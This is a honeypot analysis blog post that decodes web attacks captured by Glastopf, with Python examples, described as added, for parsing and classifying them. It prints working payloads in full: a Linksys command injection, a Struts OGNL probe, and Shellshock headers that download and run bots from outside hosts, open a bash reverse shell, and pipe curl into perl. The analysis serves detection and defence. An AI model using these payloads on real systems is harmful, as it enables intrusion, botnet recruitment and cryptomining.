Attacks on the web honeypot

The honeynet operated by the CZ.NIC association needs no special introduction to readers of this blog. Besides the articles here, the source code of the honeypots we operate is available on our GitLab. In today's article we focus on attacks caught by the web honeypot Glastopf.

Glastopf supports several kinds of logging. We use the following two:

  • a text log, in which the attacker's IP address, the HTTP method and the requested URL are stored
  • a database log, in which the attacker's complete request is stored (including the headers), i.e. information about encoding, language, user-agent, etc.; the big advantage here is that we also see the body of the request.

The request body is very often partially or fully URL-encoded (a % character followed by two hexadecimal digits).

We therefore looked into the database and identified several basic types of attacks.

1st type of attack

After URL decoding we obtained the following (line breaks added for readability):

POST /tmUnblock.cgi HTTP/1.1
Content-Length: 1036

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&
ttcp_ip=-h `
cd /tmp;
echo "#!/bin/sh" > .d7aac923.sh;
echo "wget -O .d7aac923 http://70.115.201.195:3200" >> .d7aac923.sh;
echo "chmod +x .d7aac923" >> .d7aac923.sh;
echo "./.d7aac923" >> .d7aac923.sh;
echo "rm .d7aac923" >> .d7aac923.sh;
chmod +x .d7aac923.sh;
./.d7aac923.sh`
&StartEPI=1

/tmUnblock.cgi is a CGI executable in some Cisco Linksys routers. It is vulnerable to remote command execution (RCE), more precisely blind command injection; the exploit for it became known through the worm called "The Moon".

The injected command writes a small script that downloads a file from http://70.115.201.195:3200, makes it executable, runs it and then deletes it. In the end only the script and the malware running in memory remain.

Less than 24 hours after the attack was captured, the file was no longer available at that URL.
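The two steps described above, URL-decoding the logged body and pulling the injected command out of the ttcp_ip parameter, as an added Python example (not code from the original article or from Glastopf). The encoded body is constructed here to match the decoded request shown above; the function and parameter names are my own.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: the URL-encoded form of the tmUnblock.cgi body shown above,
# on one line as the honeypot database stores it.
ENCODED_BODY = (
    "submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&"
    "ttcp_ip=-h+%60cd+%2Ftmp%3B"
    "echo+%22%23%21%2Fbin%2Fsh%22+%3E+.d7aac923.sh%3B"
    "echo+%22wget+-O+.d7aac923+http%3A%2F%2F70.115.201.195%3A3200%22+%3E%3E+.d7aac923.sh%3B"
    "echo+%22chmod+%2Bx+.d7aac923%22+%3E%3E+.d7aac923.sh%3B"
    "echo+%22.%2F.d7aac923%22+%3E%3E+.d7aac923.sh%3B"
    "echo+%22rm+.d7aac923%22+%3E%3E+.d7aac923.sh%3B"
    "chmod+%2Bx+.d7aac923.sh%3B"
    ".%2F.d7aac923.sh%60"
    "&StartEPI=1"
)

BACKTICK_RE = re.compile(r"`(.*?)`", re.DOTALL)
URL_RE = re.compile(r"https?://[^\s\"'`;]+")


def decode_form_body(body):
    """URL-decode a form body into {name: value}. Blank values are kept so
    the attacker's empty parameters stay visible in the result."""
    parsed = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def extract_injection(fields, param="ttcp_ip"):
    """Pull the backtick-injected command out of the named parameter, split it
    into individual shell statements and list the URLs it references.
    Returns None when the parameter carries no backtick substitution."""
    value = fields.get(param, "")
    m = BACKTICK_RE.search(value)
    if not m:
        return None
    command = m.group(1)
    statements = [s.strip() for s in command.split(";") if s.strip()]
    return {
        "command": command,
        "statements": statements,
        "urls": URL_RE.findall(command),
    }


def analyse_tmunblock_body(body):
    """Decode a logged POST body and describe the command injected via ttcp_ip."""
    return extract_injection(decode_form_body(body))


if __name__ == "__main__":
    result = analyse_tmunblock_body(ENCODED_BODY)
    for statement in result["statements"]:
        print(statement)
    print("download sources:", result["urls"])
```

The backtick search is what distinguishes an injection from a legitimate value: a real ttcp_ip holds an IP address and extract_injection returns None for it.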

2nd type of attack

After URL decoding we obtained the following:

POST /index.action HTTP/1.1
Expect: 100-continue
User-Agent: Mozilla/5.0

redirect:${
#res=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
#res.setCharacterEncoding("UTF-8"),
#req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
#res.getWriter().print("dir:"),
#res.getWriter().println(#req.getSession().getServletContext().getRealPath("/")),
#res.getWriter().flush(),
#res.getWriter().close()}

This is a vulnerability in Apache Struts 2, a framework for building Java web applications; again an RCE, this time through request parameters whose names start with "action:", "redirect:" or "redirectAction:", whose value is evaluated as an OGNL expression.

With this payload the attacker wants the application to print the real path of the directory in which the web application is deployed, i.e. to confirm that the injection works before sending anything more harmful.

3rd type of attack

Since 25 September we have noticed 586 requests containing a Shellshock-type attack. The following attack types all try to exploit this one vulnerability, each in a slightly different way.

GET /cgi-bin/bts.cgi HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "
cd /tmp;
wget http://100.42.30.34/sac ;
curl -O http://100.42.30.34/sac ;
perl sac ;
rm -rf sac"

GET /cgi-bin/btw.cgi HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "
cd /var/tmp ;
rm -rf sa* ;
wget http://100.42.30.34/lex1 ;
lwp-download http://100.42.30.34/lex1 ;
curl -O /var/tmp/lex1 http://100.42.30.34/lex1 ;
perl /var/tmp/lex1 ;
rm -rf /var/tmp/lex*;
rm -rf lex1"

The first request is from 13 November; the second, and others similar to it, were seen on 14, 15 and 21 November. I will describe only the second request here, since it is slightly more complicated, but the idea behind both is the same.

The attacker first deletes all files in /var/tmp whose names start with "sa".

The attacker then tries to download the Perl file in three different ways (wget, lwp-download and curl), so that the attack works even when only one of these tools is installed. The file is then run and deleted. It is a LinuxNet perlbot which connects to IRC and contains subroutines for TCP and UDP flooding and a port scanner.

There are many kinds of perlbots on the Internet. If you want to read more, we recommend a nice analysis of a similar perlbot that spread through a PHP vulnerability.

4th type of attack

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
Connection: close
Cookie: () { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1
User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1

We will analyse the following command:

/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1

  • /bin/bash -i starts an interactive shell,
  • >& redirects its standard output and standard error
  • to /dev/tcp/207.240.10.1/8888, a bash pseudo-file that opens a TCP connection to the address 207.240.10.1 on port 8888, and
  • 0>&1 duplicates that descriptor onto standard input, so the shell also reads its commands from the connection.

The shell thus reads its input (commands) from the socket /dev/tcp/207.240.10.1/8888 and sends standard output and standard error back to the same socket, so the attacker sees the output of the commands run on the attacked machine. Note that /dev/tcp is implemented by bash itself, not by the kernel, which is why the payload invokes /bin/bash explicitly rather than /bin/sh.

5th type of attack

From 27 to 30 October we noticed 504 such requests, from only 2 IP addresses but aimed at various URLs, predominantly CGI ones.

GET / HTTP/1.0
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
Pragma: no-cache
Referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
Test: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl
User-Agent: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl

The URL is no longer live, but its content can still be found on archive.org. In short, it looks like this:

#!/usr/bin/perl
use MIME::Base64;
eval (decode_base64('very long base64-encoded string'));

If we replace eval with print and run the script, we find that it is "DDoS Perl IrcBot v1.0" from 2012. The script can connect to IRC, flood, scan ports and send e-mails.
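The same unwrapping done statically, as an added Python example that is not part of the original article: instead of editing the Perl script and running it, the eval(decode_base64('...')) wrapper is located with a regular expression and decoded, layer by layer, without executing anything. The two-layer sample dropper is constructed inline (the real index.cgi carried a far longer blob); the function names are my own.

```python
import base64
import re

# Matches eval(decode_base64('...')) with optional whitespace and either quote style.
EVAL_B64_RE = re.compile(
    r"eval\s*\(\s*decode_base64\s*\(\s*['\"](?P<b64>[A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.DOTALL,
)


def unwrap_perl_eval(source, max_layers=10):
    """Peel eval(decode_base64('...')) layers off a Perl dropper without
    running it. Returns (innermost plaintext, number of layers removed).
    max_layers guards against a blob that decodes to itself."""
    layers = 0
    current = source
    while layers < max_layers:
        m = EVAL_B64_RE.search(current)
        if not m:
            break
        blob = re.sub(r"\s+", "", m.group("b64"))  # tolerate wrapped base64
        current = base64.b64decode(blob).decode("utf-8", errors="replace")
        layers += 1
    return current, layers


def _wrap(code):
    """Build one eval(decode_base64(...)) layer around Perl source (for the sample)."""
    return "eval (decode_base64('" + base64.b64encode(code.encode()).decode() + "'));"


# Constructed sample: a two-layer dropper in the style of the index.cgi above.
INNER = 'print "DDoS Perl IrcBot v1.0\\n";'
SAMPLE_DROPPER = "#!/usr/bin/perl\nuse MIME::Base64;\n" + _wrap(_wrap(INNER)) + "\n"


if __name__ == "__main__":
    plain, removed = unwrap_perl_eval(SAMPLE_DROPPER)
    print(f"removed {removed} layer(s):")
    print(plain)
```

Decoding rather than executing matters when the inner layer is not only an IRC bot: the print trick in the article runs whatever the outer layers do before the final eval, a static unwrap does not.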

6th type of attack

GET / HTTP/1.0
User-Agent: () { :;}; /bin/bash -c "
wget http://stablehost.us/bots/regular.bot -O /tmp/sh;
curl -o /tmp/sh http://stablehost.us/bots/regular.bot;
sh /tmp/sh;
rm -rf /tmp/sh"

The last example of a Shellshock attack appeared almost a month ago and its URL is still functional. It serves a shell script which the attacker runs and then deletes.

The script installs a Primecoin miner. The user name and password the miner uses can even be seen in it.

The miner tries to hide by copying itself to /usr/local/bin/spamd, and that file is then executed.
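As an added example (not code from the original article or from Glastopf), the following Python scanner pulls Shellshock payloads out of request headers in the form the honeypot logs them and sorts them into the three patterns seen in types 3 to 6 above: download-and-execute, reverse shell over /dev/tcp, and a download piped straight into an interpreter. The sample requests are constructed from the captures above with each header value on a single line, as it appears in a real log; the pattern names and detection expressions are my own.

```python
import re

# The Shellshock marker: an empty function definition followed by a command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)", re.DOTALL)
URL_RE = re.compile(r"https?://[^\s\"'`;|]+")
DEVTCP_RE = re.compile(r"/dev/tcp/(?P<host>[\w.-]+)/(?P<port>\d+)")
PIPE_RE = re.compile(r"\|\s*(perl|sh|bash|python)\b")

# Constructed samples mirroring the requests shown above (types 3, 4 and 5).
SAMPLES = [
    "GET /cgi-bin/bts.cgi HTTP/1.0\n"
    'User-Agent: () { :;}; /bin/bash -c "cd /tmp; wget http://100.42.30.34/sac ; '
    'curl -O http://100.42.30.34/sac ; perl sac ; rm -rf sac"\n',
    "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0\n"
    "Connection: close\n"
    "Cookie: () { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1\n"
    "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1\n",
    "GET / HTTP/1.0\n"
    "Cookie: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl\n"
    "Referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl\n"
    "User-Agent: Mozilla/5.0\n",
]


def parse_request(raw):
    """Split a raw HTTP request into (request line, {header: value}).
    A header repeated in one request keeps its last value; enough for this scan."""
    lines = [line.rstrip("\r") for line in raw.strip("\r\n").split("\n")]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return lines[0].strip(), headers


def classify_command(cmd):
    """Label what the injected command does, in the order the patterns overlap:
    a /dev/tcp redirect wins over a pipe, a pipe wins over a bare download."""
    if DEVTCP_RE.search(cmd):
        return "reverse-shell"
    if PIPE_RE.search(cmd):
        return "pipe-to-interpreter"
    if URL_RE.search(cmd):
        return "download-and-execute"
    return "other"


def scan_shellshock(raw):
    """Return one finding per header that carries a Shellshock payload."""
    request_line, headers = parse_request(raw)
    findings = []
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        finding = {
            "request": request_line,
            "header": name,
            "command": cmd,
            "kind": classify_command(cmd),
            "urls": list(dict.fromkeys(URL_RE.findall(cmd))),  # dedupe, keep order
        }
        tcp = DEVTCP_RE.search(cmd)
        if tcp:
            finding["callback"] = (tcp.group("host"), int(tcp.group("port")))
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for sample in SAMPLES:
        for f in scan_shellshock(sample):
            print(f["request"], f["header"], f["kind"], f["urls"], f.get("callback"))
```

Scanning every header rather than only User-Agent is the point: as types 4 and 5 show, the same payload is planted in Cookie, Referer and even made-up headers such as Test, because a CGI wrapper exports all of them into the environment where bash picks them up.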

This list is certainly not complete, and it changes over time with the vulnerabilities currently present in widely used software. For that reason alone we will surely return to this topic after some time.
